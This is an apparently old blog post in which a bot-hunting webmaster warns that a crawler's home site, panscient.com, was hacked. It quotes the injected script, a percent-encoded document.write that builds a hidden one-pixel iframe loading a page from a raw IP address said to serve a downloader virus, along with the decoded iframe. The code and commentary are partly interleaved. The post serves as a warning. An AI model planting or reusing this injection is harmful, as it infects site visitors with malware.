Beware that investigating user agents and referrers that show up in your log files because you could just end up being infected with a virus!
This little crawler left a his calling card:
38.99.203.110 "panscient.com"A quick trip to the Panscient site shows it has been hacked and the home page has this javascript inserted into the top of the file:
<script language="javascript"> document.write(When decoded that javascript becomes a link to the source of the downloader virus:
unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') ); </script>
<iframe src= http://81.95.146.98/index.htmlThanks to John Andrews for the tip that they were hacked and spreading a virus as I've been to Panscient's site before and didn't notice anything wrong., but it was definitely infected I went there today!
frameborder="0" width="1" height="1" scrolling="no"
name=counter></iframe>
Just heed this as a cautionary tale that things in your log file could be a lure by hackers to infect you with something not currently detected by virus scanners, which is a good reason why I disable javascript when I do most of my bot hunting.
Besides, who best to hack and humiliate than the very people that battle these vermin on a daily basis?
So bot busters BEWARE!
UPDATE - I checked other domains on the server and it's hacked all over the place. Hard to believe that a company selling custom search engines doesn't even have their own dedicated server, just weird.